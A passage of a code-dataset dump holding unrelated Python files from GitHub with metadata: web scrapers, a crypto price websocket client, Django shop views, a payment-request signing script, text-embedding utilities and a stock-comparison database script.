EvergreenstatePrepmod(ScraperBase):\n\n def __init__(self):\n self.URL = 
\"https://snohomish-county-coronavirus-response-snoco-gis.hub.arcgis.com/pages/covid-19-vaccine\"\n self.LocationName = \"EvergreenState\"\n self.Keys = [\"evergreen_state_prep\"]\n\n @SaveHtmlToTable\n def MakeGetRequest(self) -> Tuple[List[str], Status, str]:\n #Make outbound GET to the URL in question\n r = requests.get(self.URL)\n\n #Parse the HTML\n soup = BeautifulSoup(r.content, 'html.parser')\n\n prepmod_links = [] # list of prepmod links on main website\n #finds monreos prepmod link only\n for place in soup.find_all('ul'):\n if \"Monroe\" in place.text:\n for link in place.find_all('a', attrs={'href': re.compile(\"^https://prepmod\")}):\n prepmod_links.append(link.get('href'))\n\n #create prepmod object\n prep = prepmod(prepmod_links)\n #gets combined status of links\n case = prep.getcase()\n\n if case == Status.POSSIBLE:\n # Failure case not met, leave as possible\n # HTML will be auto uploaded by wrapper function\n logging.info(self.LocationName + \" site has changed, recheck\")\n\n\n return self.Keys, case, r.text\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n scraper = EvergreenstatePrepmod()\n keys, case, text = scraper.MakeGetRequest()\n logging.debug(f\"keys={keys} case={case}\")\n", "repo_name": "CovidWA/scrapers-oss", "sub_path": "python/EvergreenstatePrepmod.py", "file_name": "EvergreenstatePrepmod.py", "file_ext": "py", "file_size_in_byte": 1716, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "ScraperBase.ScraperBase", "line_number": 12, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 25, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 31, "usage_type": "call"}, {"api_name": "prepmod.prepmod", "line_number": 35, "usage_type": "call"}, {"api_name": "Common.Status.POSSIBLE", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Common.Status", "line_number": 39, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 42, "usage_type": "call"}, {"api_name": "Common.SaveHtmlToTable", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "Common.Status", "line_number": 20, "usage_type": "name"}, {"api_name": "logging.basicConfig", "line_number": 48, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 48, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "27815548254", "text": "#https://pypi.org/project/websocket_client/\nimport websocket\nimport pprint\nimport json\nptp = pprint.PrettyPrinter(width= 50, compact= True)\n\ndef on_message(ws, message):\n js = json.loads(message)\n if js['type'] != 'ping':\n print(\"\\n cool\")\n print(js['data'][0]['p'])\n\ndef on_error(ws, error):\n print(error)\n\ndef on_close(ws):\n print(\"### closed ###\")\n\ndef on_open(ws):\n ws.send('{\"type\":\"subscribe\",\"symbol\":\"BINANCE:DOGEUSDT\"}')\n\nif __name__ == \"__main__\":\n websocket.enableTrace(True) \n ws = websocket.WebSocketApp(\"wss://ws.finnhub.io?token=c2i0532ad3idsa35ckk0\",\n on_message = on_message,\n on_error = on_error,\n on_close = on_close)\n ws.on_open = on_open\n ws.run_forever()", "repo_name": "coolxm/Dogecoin", "sub_path": "Price.py", "file_name": "Price.py", "file_ext": "py", "file_size_in_byte": 804, 
"program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pprint.PrettyPrinter", "line_number": 5, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 8, "usage_type": "call"}, {"api_name": "websocket.enableTrace", "line_number": 23, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "14465976629", "text": "import sqlite3\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef scrape_books():\n response = requests.get(\"http://books.toscrape.com/catalogue/category/books/classics_6/index.html\")\n soup = BeautifulSoup(response.text, \"html.parser\")\n books = soup.find_all(\"article\")\n\n books_list = []\n for book in books:\n books_list.append((get_title(book), get_price(book), get_rating(book)))\n save_books(books_list)\n\n\ndef get_title(book):\n return book.find(\"h3\").find(\"a\")[\"title\"]\n\n\ndef get_price(book):\n price = book.find(class_=\"price_color\").get_text()\n return float(price.replace(\"£\", \"\").replace(\"Â\", \"\"))\n\n\ndef get_rating(book):\n ratings = {\"Zero\": 0, \"One\": 1, \"Two\": 2, \"Three\": 3, \"Four\": 4, \"Five\": 5}\n paragraph = book.find(class_=\"star-rating\")\n rating_text = paragraph.get_attribute_list(\"class\")[-1]\n return ratings[rating_text]\n\n\ndef save_books(all_books):\n connection = sqlite3.connect(\"books.db\")\n c = connection.cursor()\n c.execute(\"CREATE TABLE books (title TEXT, price REAL, rating INTEGER)\")\n c.executemany(\"INSERT INTO books VALUES (?,?,?)\", all_books)\n connection.commit()\n connection.close()\n\n\nscrape_books()\n", "repo_name": "OktarianTB/Python-Projects", "sub_path": "Mini-Projects/book_scraper.py", "file_name": "book_scraper.py", "file_ext": "py", "file_size_in_byte": 1189, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 8, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "31570061954", "text": "# %%\n# Project for testing geoutils on paleo data.\nimport xarray as xr\nimport numpy as np\nimport geoutils.geodata.base_dataset as bds\nimport geoutils.plotting.plots as gplt\nimport geoutils.utils.time_utils as tu\nfrom importlib import reload\n\n# %%\n# Read files\nreload(bds)\ndata_folder = '/home/strnad/data/era5/'\norograph_file = f'{data_folder}/orography_2019.nc'\n\ngrid_step = None\nds_era5_orography = bds.BaseDataset(data_nc=orograph_file,\n var_name=None,\n grid_step=grid_step,\n decode_times=False,\n )\nds_era5_orography.average_time()\n# %%\n# %%\nreload(gplt)\nmean_t = ds_era5_orography.get_da()/9.81\nim_comp = gplt.plot_map(dmap=mean_t,\n plot_type='contourf',\n cmap='cividis',\n levels=12,\n vmin=0,\n # vmax=310,\n title=f\"Global Orography ERA5 \",\n label=f'Elevation [m]',\n orientation='horizontal',\n tick_step=3,\n # round_dec=2,\n set_map=False,\n sci=3,\n )\n\n# %%\nsavepath = f'{data_folder}/orography_era5.nc'\nds_era5_orography.save(filepath=savepath)", "repo_name": "fstrnad/geoutils", "sub_path": "geoutils/geodata/orography.py", "file_name": "orography.py", "file_ext": "py", "file_size_in_byte": 1385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "importlib.reload", "line_number": 12, "usage_type": "call"}, 
{"api_name": "geoutils.geodata.base_dataset", "line_number": 12, "usage_type": "argument"}, {"api_name": "geoutils.geodata.base_dataset.BaseDataset", "line_number": 17, "usage_type": "call"}, {"api_name": "geoutils.geodata.base_dataset", "line_number": 17, "usage_type": "name"}, {"api_name": "importlib.reload", "line_number": 25, "usage_type": "call"}, {"api_name": "geoutils.plotting.plots", "line_number": 25, "usage_type": "argument"}, {"api_name": "geoutils.plotting.plots.plot_map", "line_number": 27, "usage_type": "call"}, {"api_name": "geoutils.plotting.plots", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "33033949023", "text": "import random\nfrom datetime import date\n\nfrom django.db.models import Q\nfrom django.http import JsonResponse\nfrom django.views import View\n\nfrom .models import Category, SubCategory, Product, DiscountRate, DailySpecialDiscount\n\n\n# 이 상품 어때요?\nclass RecommendView(View):\n def get(self, request):\n try:\n categories = Category.objects.all()\n random_categories = random.sample(list(categories), 8)\n\n random_sub_category_list = [random.choice(category.subcategory_set.all()) for category in random_categories]\n random_product_list = [random.choice(sub_category.product_set.all()) for sub_category in random_sub_category_list]\n\n listgoods = [\n {\n \"product_id\" : product.id,\n \"image_url\" : product.image_url, \n \"name\" : product.name, \n \"price\" : product.price,\n \"discount_rate\": product.discountrate_set.get(product_id=product.id).discount_rate \n if DiscountRate.objects.filter(product=product).exists() \n else None\n }\n for product in random_product_list]\n\n return JsonResponse({\"listgoods\": listgoods}, status=200)\n\n except ValueError:\n return JsonResponse({\"message\": \"ValueError\"}, status=500)\n\n except IndexError:\n return JsonResponse({\"message\": \"IndexError\"}, status=500)\n \n\n#카테고리별 모든 상품들 \nclass ProductView(View):\n def get(self, request):\n category_id = request.GET.get('category')\n sub_category_id = request.GET.get('sub-category')\n sort = request.GET.get('sort')\n page = int(request.GET.get('page', 1))\n\n PAGE_LIMIT = 30\n\n sort_keyword = {\n \"new\" : \"-uploaded_at\",\n \"best\": \"-stock\"\n } \n\n # 카테고리 리스트 표출\n if category_id or sub_category_id:\n products = Product.objects.filter(Q(sub_category__category_id=category_id)|Q(sub_category_id=sub_category_id))[(page-1)*PAGE_LIMIT:page*PAGE_LIMIT]\n else:\n products = Product.objects.all().order_by(sort_keyword[sort])[(page-1)*PAGE_LIMIT:page*PAGE_LIMIT]\n \n product_list = [ \n {\n \"product_id\" : product.id,\n \"name\" : product.name,\n \"image_url\" : product.image_url,\n \"price\" : product.price,\n \"discount_rate\": product.discountrate_set.get(product=product).discount_rate \n if DiscountRate.objects.filter(product=product).exists() else None\n } for product in products\n ]\n\n return JsonResponse({\"product_list\": product_list}, status=200)\n\n\nclass CategoryView(View):\n def get(self, request):\n categories = Category.objects.all()\n\n result = [\n {\n 'id': category.id,\n 'category' : category.name,\n 'subcategories': [\n {\n \"sub_category_id\": sub_category.id,\n \"sub_category_name\": sub_category.name\n } for sub_category in SubCategory.objects.filter(category=category)\n ]\n } for category in categories ]\n \n return JsonResponse({'result': result}, status=200)\n\n\nclass DailySpecialProductView(View):\n def get(self, request):\n start_date = date.today()\n daily_products = DailySpecialDiscount.objects.filter(start_date=start_date)\n\n 
dailyspecial = [ {\n 'product_id':daily_product.product.id,\n 'name':daily_product.product.name,\n 'image_url':daily_product.product.image_url,\n 'price':daily_product.product.price,\n 'daily_discount_rate': daily_product.daily_discount_rate,\n 'start_date':start_date\n } for daily_product in daily_products\n ]\n \n return JsonResponse({'dailyspecial': dailyspecial}, status=200)\n\n\n# MD recommendation \nclass MDRecommendView(View):\n def get(self, request):\n limit = request.GET.get('limit', 6)\n offset = request.GET.get('offset', 6)\n category_id = int(offset)/int(limit)\n\n category = Category.objects.get(id=category_id)\n\n sub_categories = category.subcategory_set.all()\n random_sub_categories = random.sample(list(sub_categories), 3)\n\n product_list_by_category = []\n for sub_category in random_sub_categories:\n two_products = sub_category.product_set.all().order_by('-stock')[:2]\n for product in two_products:\n product_info = {\n 'product_id' : product.id,\n \"name\" : product.name,\n \"image_url\" : product.image_url,\n \"price\" : product.price,\n \"discount_rate\": product.discountrate_set.get(product_id=product.id).discount_rate \n if DiscountRate.objects.filter(product=product).exists() \n else None\n } \n \n product_list_by_category.append(product_info)\n\n return JsonResponse({\"product_list_by_category\": product_list_by_category}, status=200)\n\n\nclass DetailProductView(View):\n def get(self, request, product_id):\n \n exist_product = Product.objects.filter(id=product_id).exists()\n if not exist_product:\n return JsonResponse({'message': 'PRODUCT_DOES_NOT_EXIST'}, status=400)\n\n product = Product.objects.get(id=product_id)\n \n have_discount = DiscountRate.objects.filter(product=product).exists()\n if have_discount:\n discount = DiscountRate.objects.get(product=product)\n discount_rate = discount.discount_rate\n else:\n discount_rate = None\n \n info = {\n 'id': product_id,\n 'name': product.name,\n 'description': product.description,\n 'image_url': product.image_url,\n 'price': product.price,\n 'stock': product.stock,\n 'content': product.content,\n 'uploaded_at': product.uploaded_at,\n 'sales_unit': product.sales_unit if product.sales_unit else [],\n 'amount': product.amount if product.amount else [],\n 'origin': product.origin if product.origin else [],\n 'storage_method': product.storage_method.name if product.storage_method else [],\n 'expiration_date': product.expiration_date if product.expiration_date else [],\n 'discount_rate': discount_rate\n }\n\n sub_category = Product.objects.get(id=product_id).sub_category\n products = Product.objects.filter(sub_category=sub_category)\n random_products = random.sample(list(products), 3)\n related_products = [{'id': product.id,\n 'name': product.name,\n 'image_url': product.image_url,\n 'price': product.price\n } for product in random_products]\n\n return JsonResponse({'info': info, 'related_products': related_products}, status=200)\n", "repo_name": "wecode-bootcamp-korea/18-1st-MarketHoly-backend", "sub_path": "product/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 7484, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.views.View", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 15, "usage_type": "name"}, 
{"api_name": "random.sample", "line_number": 16, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 18, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 19, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects.filter", "line_number": 28, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.DiscountRate", "line_number": 28, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 33, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 36, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 39, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 43, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 59, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Product.objects.all", "line_number": 61, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 61, "usage_type": "name"}, {"api_name": "models.DiscountRate.objects.filter", "line_number": 70, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "models.DiscountRate", "line_number": 70, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 74, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 77, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 79, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 79, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 79, "usage_type": "name"}, {"api_name": "models.SubCategory.objects.filter", "line_number": 89, "usage_type": "call"}, {"api_name": "models.SubCategory.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "models.SubCategory", "line_number": 89, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 93, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 96, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 98, "usage_type": "name"}, {"api_name": "models.DailySpecialDiscount.objects.filter", "line_number": 99, "usage_type": "call"}, {"api_name": "models.DailySpecialDiscount.objects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "models.DailySpecialDiscount", "line_number": 99, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 111, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 115, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 121, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 121, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 121, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 124, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects.filter", "line_number": 136, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects", "line_number": 136, "usage_type": 
"attribute"}, {"api_name": "models.DiscountRate", "line_number": 136, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 142, "usage_type": "call"}, {"api_name": "django.views.View", "line_number": 145, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 148, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 148, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 148, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 150, "usage_type": "call"}, {"api_name": "models.Product.objects.get", "line_number": 152, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 152, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 152, "usage_type": "name"}, {"api_name": "models.DiscountRate.objects.filter", "line_number": 154, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects", "line_number": 154, "usage_type": "attribute"}, {"api_name": "models.DiscountRate", "line_number": 154, "usage_type": "name"}, {"api_name": "models.DiscountRate.objects.get", "line_number": 156, "usage_type": "call"}, {"api_name": "models.DiscountRate.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "models.DiscountRate", "line_number": 156, "usage_type": "name"}, {"api_name": "models.Product.objects.get", "line_number": 178, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 178, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 178, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 179, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 179, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 179, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 180, "usage_type": "call"}, {"api_name": "django.http.JsonResponse", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "38533775245", "text": "##########################################\nimport io\nimport sys\n\n_INPUT = \"\"\"\\\n6\n2 4 4 9 4 9\n\n\"\"\"\nsys.stdin = io.StringIO(_INPUT)\n##########################################\nN = int(input())\nAlist = list(map(int,input().split()))\n\nl,r,x = 0,0,0\n#Alist.append(1)\nnum = sorted(list(set(Alist)))\n\nmaxsum = -10*15\nfor i in range(len(num)):\n temp=0\n for j in range(len(Alist)):\n if num[i]<=Alist[j]:\n temp+=num[i]\n maxsum=max(temp,maxsum)\n else:\n temp=0\nprint (maxsum)\n", "repo_name": "caffein1371/tomidori", "sub_path": "ABC189C.py", "file_name": "ABC189C.py", "file_ext": "py", "file_size_in_byte": 486, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.stdin", "line_number": 10, "usage_type": "attribute"}, {"api_name": "io.StringIO", "line_number": 10, "usage_type": "call"}]} +{"seq_id": "28654427449", "text": "import requests\r\n#Import libraries\r\nimport hashlib\r\nimport hmac\r\nimport json\r\n\r\npayload = {\r\n \"live\": 0,\r\n \"oid\": \"112\",\r\n \"inv\": \"112020102292999\",\r\n \"ttl\": 900,\r\n \"tel\": \"256712375678\",\r\n \"eml\": \"kajuej@gmailo.com\",\r\n \"vid\": \"demo\",\r\n \"curr\": \"KES\",\r\n \"p1\": \"airtel\",\r\n \"p2\": \"020102292999\",\r\n \"p3\": \"\",\r\n \"p4\": \"900\",\r\n \"cbk\": \"https://\",\r\n \"cst\": 1,\r\n \"crl\": 2,\r\n}\r\n\r\nres = ''.join(str(val) for key, val in payload.items())\r\npayload = bytes(res, 
encoding='utf-8')\r\nprint(payload)\r\n\r\nkey = b'demoCHANGED'\r\nmy_hmac = hmac.new(key, payload, hashlib.sha1).hexdigest()\r\n\r\npayload = {\r\n \"live\": 0,\r\n \"oid\": \"112\",\r\n \"inv\": \"112020102292999\",\r\n \"ttl\": 900,\r\n \"tel\": \"256712375678\",\r\n \"eml\": \"kajuej@gmailo.com\",\r\n \"vid\": \"demo\",\r\n \"curr\": \"KES\",\r\n \"p1\": \"airtel\",\r\n \"p2\": \"020102292999\",\r\n \"p3\": \"\",\r\n \"p4\": \"900\",\r\n \"cbk\": \"https://\",\r\n \"cst\": 1,\r\n \"crl\": 2,\r\n \"hsh\": my_hmac\r\n}\r\n\r\n\r\nresponse = requests.post('https://payments.ipayafrica.com/v3/ke', data=payload)\r\nprint(response.text)", "repo_name": "waruingugi/web_app_test", "sub_path": "hash4.py", "file_name": "hash4.py", "file_ext": "py", "file_size_in_byte": 1076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "hmac.new", "line_number": 30, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 30, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "8401576070", "text": "import numpy as np\nfrom scipy import spatial\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA\n\n# Internal imports\nfrom mip_dmp.utils.io import load_glove_model, load_c2v_model\n\n\ndef glove_embedding(text, glove_model):\n \"\"\"Find the Glove embedding for the text.\n\n Parameters\n ----------\n text : str\n Text to be embedded.\n\n glove_model : str\n Glove model to be used, loaded by the gensim library.\n\n Returns\n -------\n numpy.ndarray\n Glove embedding for the text.\n \"\"\"\n\n def preprocess_text(text):\n \"\"\"Preprocess the text.\n\n Parameters\n ----------\n text : str\n Text to be preprocessed.\n\n Returns\n -------\n str\n Preprocessed text.\n \"\"\"\n # Lowercase the text.\n text = text.lower()\n # Tokenize the text.\n text = [s for s in text if s != \"\" and s != \"_\"] # Make a list of characters.\n return text\n\n # Preprocess the text.\n text = preprocess_text(text)\n # Find the Glove embedding for the text.\n embedding = np.sum(np.array([glove_model[i] for i in text]), axis=0)\n return embedding\n\n\ndef chars2vec_embedding(text, chars2vec_model):\n \"\"\"Find the chars2vec embedding for the text.\n\n Parameters\n ----------\n text : str\n Text to be embedded.\n\n chars2vec_model : str\n chars2vec model to be used, loaded by the gensim library.\n\n Returns\n -------\n numpy.ndarray\n chars2vec embedding for the text.\n \"\"\"\n # Find the chars2vec embedding for the text.\n # The chars2vec model expects a list of strings as input.\n # The output is a list of embeddings, so we take the first element.\n embedding = chars2vec_model.vectorize_words([text])[0]\n return embedding\n\n\ndef embedding_similarity(x_embedding, y_embedding):\n \"\"\"Find the matches based on chars2vec embeddings and cosine similarity.\n\n Parameters\n ----------\n x_embedding : str\n String to compare against.\n\n y_embedding : str\n String to compare.\n\n chars2vec_model : str\n chars2vec model to be used, loaded by the gensim library.\n\n Returns\n -------\n float\n Cosine similarity between the two chars2vec embeddings of the strings.\n \"\"\"\n return spatial.distance.cosine(x_embedding, y_embedding)\n\n\ndef generate_embeddings(words: list, embedding_method: str = \"chars2vec\"):\n \"\"\"Generate embeddings for a list of words.\n\n Parameters\n ----------\n words : list\n List of words to generate embeddings for.\n\n embedding_method : 
str\n Embedding method to be used, either \"chars2vec\" or \"glove\".\n\n Returns\n -------\n list\n List of embeddings for the words.\n \"\"\"\n print(f\"> Generating embeddings for {len(words)} words...\")\n if embedding_method == \"chars2vec\":\n c2v_model = load_c2v_model()\n embeddings = [chars2vec_embedding(word, c2v_model) for word in words]\n elif embedding_method == \"glove\":\n glove_model = load_glove_model()\n embeddings = [glove_embedding(word, glove_model) for word in words]\n else:\n embeddings = None\n return embeddings\n\n\ndef find_n_closest_embeddings(\n word_embedding: np.array, embeddings: list, embedding_words: list, n: int = 5\n):\n \"\"\"Find the n closest embeddings to the given embedding.\n\n Parameters\n ----------\n word_embedding : numpy.ndarray\n Embedding to find the n closest embeddings to.\n\n embeddings : list\n List of embeddings to find the closest embeddings to the given embedding in.\n\n embedding_words : list\n List of words corresponding to the embeddings that will be resorted and reduced accordingly.\n\n n : int\n Number of closest embeddings to find.\n\n Returns\n -------\n dict\n Dictionary containing the n closest embeddings, their distances to the given embedding,\n and the words corresponding to the embeddings in the form::\n\n {\n \"distances\": [float],\n \"embeddings\": [numpy.ndarray],\n \"embedding_words\": [str]\n }\n \"\"\"\n distances = np.array(\n [spatial.distance.cosine(word_embedding, embedding) for embedding in embeddings]\n ).astype(np.float32)\n sorted_indices = np.argsort(distances)\n return dict(\n {\n \"distances\": [distances[i] for i in sorted_indices[0:n]],\n \"embeddings\": [embeddings[i] for i in sorted_indices[0:n]],\n \"embedding_words\": [embedding_words[i] for i in sorted_indices[0:n]],\n }\n )\n\n\ndef reduce_embeddings_dimension(\n embeddings: list, reduce_method: str = \"tsne\", n_components: int = 3\n):\n \"\"\"Reduce the dimension of the embeddings, mainly for visualization purposes.\n\n Parameters\n ----------\n embeddings : list\n List of embeddings to reduce the dimension of.\n\n reduce_method : str\n Method to use to reduce the dimension, either \"tsne\" or \"pca\".\n\n n_components : int\n Number of components to reduce the dimension to.\n\n Returns\n -------\n list\n List of reduced embeddings.\n \"\"\"\n print(\n f\"> Reducing embeddings dimensionality to {n_components} using {reduce_method}...\"\n )\n if reduce_method == \"tsne\":\n tsne_model = TSNE(\n perplexity=40,\n n_components=n_components,\n init=\"pca\",\n n_iter=2500,\n random_state=42,\n )\n reduction_values = tsne_model.fit_transform(np.array(embeddings))\n elif reduce_method == \"pca\":\n pca_model = PCA(n_components=n_components, random_state=42)\n reduction_values = pca_model.fit_transform(np.array(embeddings))\n else:\n print(f\"ERROR: Invalid reduction method ({reduce_method})!\")\n reduction_values = None\n return (\n reduction_values[:, 0],\n reduction_values[:, 1],\n reduction_values[:, 2],\n )\n", "repo_name": "HBPMedical/mip-dmp", "sub_path": "mip_dmp/process/embedding.py", "file_name": "embedding.py", "file_ext": "py", "file_size_in_byte": 5939, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.sum", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", 
"line_number": 95, "usage_type": "attribute"}, {"api_name": "scipy.spatial", "line_number": 95, "usage_type": "name"}, {"api_name": "mip_dmp.utils.io.load_c2v_model", "line_number": 116, "usage_type": "call"}, {"api_name": "mip_dmp.utils.io.load_glove_model", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 157, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 158, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 158, "usage_type": "attribute"}, {"api_name": "scipy.spatial", "line_number": 158, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 159, "usage_type": "attribute"}, {"api_name": "numpy.argsort", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.manifold.TSNE", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.decomposition.PCA", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 205, "usage_type": "call"}]} +{"seq_id": "41776118331", "text": "import pyodbc\nimport sqlite3\nimport pandas as pd\n\nconn = sqlite3.connect(\"DB_compare.db\")\ncursor = conn.cursor()\n\n# definig fucntion for counting rows\ndef row_count(querry):\n cursor.execute('{}'.format(querry))\n count_val = cursor.fetchone()[0]\n conn.commit()\n return count_val\n\n# defining simple querries\ndef panda_querry(querry):\n sql = pd.read_sql('{}'.format(querry),conn)\n return sql\n\n# out of stock products count in both databases\nout_of_stock_woo = row_count('SELECT count(Nazwa) FROM prod_woo WHERE Status = \\'outofstock\\'')\nout_of_stock_sub = row_count('SELECT count(Nazwa) FROM prod_subiekt Where prod_subiekt.Stan < prod_subiekt.Stan_Minimalny')\n\n# products with low stock locally -> should be out of stock online\ndf_low_stock = panda_querry(\"\"\"\nSELECT prod_woo.Nazwa, prod_woo.Symbol, prod_woo.Stan as Stan_Woo, prod_subiekt.Stan as Stan_Sub \nFROM prod_woo join prod_subiekt ON prod_woo.Symbol = prod_subiekt.Symbol\nWHERE prod_subiekt.Stan < prod_woo.Stan\nAND prod_woo.Status != 'outofstock';\n\"\"\")\n# products with high stock locally -> should be in stock online\ndf_low_stock_woo = panda_querry(\"\"\"\nSELECT prod_woo.Nazwa, prod_woo.Symbol, prod_woo.Stan as Stan_Woo, prod_subiekt.Stan as Stan_Sub \nFROM prod_woo join prod_subiekt ON prod_woo.Symbol = prod_subiekt.Symbol\nWHERE prod_subiekt.Stan > prod_woo.Stan\nAND prod_woo.Status = 'outofstock';\n\"\"\")\n\n# checking if the out of stock match\nif df_low_stock_woo.empty:\n print('Subiekt low stock products CHECKED')\nelse:\n print('Woo Database out of stock products: {}'.format(out_of_stock_woo))\n print('Subiekt Database out of stock products: {}'.format(out_of_stock_sub))\n print('Higher stock locally')\n print('Check those products: ','\\n', df_low_stock_woo)\n\nif df_low_stock.empty:\n print('\\n''Woo low stock products CHECKED')\nelse:\n print('\\n''Woo Database out of stock products: {}'.format(out_of_stock_woo))\n print('Subiekt Database out of stock products: {}'.format(out_of_stock_sub))\n print('Low stock locally')\n print('Check those products online: ', '\\n', df_low_stock)\n\n# counting all rows in both tables \nrow_count_woo = row_count('SELECT COUNT(Nazwa) FROM prod_woo')\nrow_count_sub = row_count('SELECT COUNT(Nazwa) FROM prod_subiekt')\n\n# looking for products with no match in the Woo database\ndf_diff_stock = 
